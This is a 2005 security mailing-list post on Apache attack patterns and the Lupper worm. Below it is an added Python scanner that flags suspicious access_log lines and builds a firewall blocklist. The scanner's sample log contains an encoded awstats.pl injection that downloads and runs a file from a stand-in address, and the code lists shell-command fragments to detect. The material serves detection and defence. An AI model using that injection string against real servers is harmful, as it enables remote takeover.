[Dshield] A Couple of New Apache Hack Patterns
jayjwa at atr2.ath.cx
Fri Dec 16 01:47:39 GMT 2005
On Wed, 14 Dec 2005, David Cary Hart wrote:
-> 1. index2.php | index.php
-> 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
-> HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
-> 2. POST directly to the form mail php processing page. In other words,
-> something like contact.php is passed to, and processed by
-> ContactProc.php. The would-be spammer-hacker-miscreant is trying to
-> forward mail by eliminating the form entry page.
-> The strategy I am using these days is to SWATCH the patterns -> rewrite
-> rule to hacker.php -> firewall rule. The purpose of the interim
-> hacker.php is to provide information just in case of a false positive.
-> Hacker.php then writes a unique line to access_log which swatch
-> recognizes to trigger the firewall rule.
You didn't try mod_security? http://www.modsecurity.org/
Wow! A new Linux virus? ->
cback -> Infection: Unix/Lupper.C (exact)
The last "cback" I saw was a connect-back Perl script. This is obviously an
Hmmm, now that I look at it, it's little more than a mini connect proxy. It
takes two parameters: "%s <host> <port>\n" , forks and passes on the
connection. I'd imagine it's used by spammers to make the mail connection look
like it's coming from another computer than what it really is. It doesn't
have the same functionality as the one described here:
"Lupper.C is a worm designed to spread through web servers by exploiting two
different security vulnerabilities. This variant has been distributed as
443,364-byte I386 ELF program.
Method of Distribution
Lupper attempts to execute a simple set of four commands on a remote server:
* Change folder to /tmp
* Use Wget to download a copy of the worm named "listen" from a particular
hard-coded IP address
* Modify its execution attributes
* Execute the downloaded copy of the worm
The worm sends the above commands by exploiting the following vulnerabilities:
* AWStats Rawlog Plugin Input Vulnerability (Bugtraq 10950)
* XML-RPC for PHP Remote Code Execution Exploit (CAN-2005-1921) (Bugtraq
Trying to exploit the AWStats vulnerability, the worm attempts to submit its
commands to the awstats.pl script at the following locations:
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its
commands to the following scripts:
Lupper.C opens a UDP backdoor on port 27105."
This file is much smaller.
4172 cback (bytes)
%s <host> <port>
retring in 5 seconds
fork error, retyr in 5 seconds
cannot create socket, retring in 5 seconds
I got a little excited there for a second; a new Linux virus would certainly
be something. I'm so jealous of Windows!
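A worked example, added here and not part of either post in the thread: a small Python scanner that applies the patterns discussed above (the Lupper command set injected through awstats.pl, POSTs to an XML-RPC endpoint, and a direct POST to a form-processing page with no referer) to Apache combined-format access_log lines, then produces the address list a firewall rule would consume, which is the last step of the SWATCH-to-firewall chain in the quoted post. The log lines, the endpoint names xmlrpc.php and /ContactProc.php, and the shape of the injected query are constructed for illustration and are not taken from the thread or from the worm.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip ident user [ts] "METHOD url proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Hypothetical form-processing pages that should only be reached from their
# entry form (the contact.php -> ContactProc.php case in the quoted post).
FORM_PROCESSORS = {"/ContactProc.php"}

# Shell fragments matching the four-step command set the worm submits
# (cd /tmp, wget, chmod, execute) when injected through awstats.pl.
SHELL_FRAGMENTS = ("cd /tmp", "wget ", "chmod ", ";./", "|./")


def classify(line):
    """Return (reason, client_ip) for a suspicious line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip = m.group("ip")
    method = m.group("method")
    url = unquote(m.group("url"))          # decode %3B, %20 etc. before matching
    path = url.split("?", 1)[0]
    referer = m.group("referer")
    lowered = url.lower()

    # AWStats: awstats.pl hit with shell commands smuggled into the query string.
    if path.endswith("/awstats.pl") and any(f in lowered for f in SHELL_FRAGMENTS):
        return ("awstats-command-injection", ip)

    # XML-RPC for PHP: the endpoint name xmlrpc.php is an assumption. Legitimate
    # clients POST here too, and the access_log does not carry the body where the
    # injected commands live, so treat this as a review-tier hit, not a block.
    if method == "POST" and path.endswith("/xmlrpc.php"):
        return ("xmlrpc-post", ip)

    # Direct POST to the form processor, bypassing the entry form (no referer).
    if method == "POST" and path in FORM_PROCESSORS and referer == "-":
        return ("direct-form-post", ip)

    return None


def scan(log_text):
    """Classify every non-blank line; return the list of (reason, ip) hits in order."""
    hits = []
    for line in log_text.splitlines():
        if line.strip():
            hit = classify(line)
            if hit:
                hits.append(hit)
    return hits


def blocklist(hits):
    """Sorted, de-duplicated client addresses, i.e. what a firewall rule would take."""
    return sorted({ip for _, ip in hits})


# Constructed sample log, not real traffic. The awstats query decodes to
# "x=;cd /tmp;wget 198.51.100.7/listen;chmod +x listen;./listen".
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2005:03:11:09 +0000] "GET /cgi-bin/awstats.pl?x=%3Bcd%20%2Ftmp%3Bwget%20198.51.100.7%2Flisten%3Bchmod%20%2Bx%20listen%3B.%2Flisten HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
198.51.100.23 - - [14/Dec/2005:03:12:40 +0000] "POST /xmlrpc.php HTTP/1.0" 200 1187 "-" "-"
192.0.2.44 - - [14/Dec/2005:03:15:02 +0000] "POST /ContactProc.php HTTP/1.1" 200 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.80 - - [14/Dec/2005:03:16:02 +0000] "GET /index.php HTTP/1.1" 200 3320 "-" "Mozilla/5.0 (X11; U; Linux i686)"
192.0.2.80 - - [14/Dec/2005:03:16:30 +0000] "POST /ContactProc.php HTTP/1.1" 200 412 "http://www.example.com/contact.php" "Mozilla/5.0 (X11; U; Linux i686)"
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for reason, ip in found:
        print(f"{ip:16} {reason}")
    print("block:", " ".join(blocklist(found)))
```

The referer check is the weakest of the three: a browser behind a privacy proxy also sends "-", so in practice that hit should feed the interim hacker.php step from the quoted post rather than going straight to the firewall, while the decoded awstats query is unambiguous enough to block on directly.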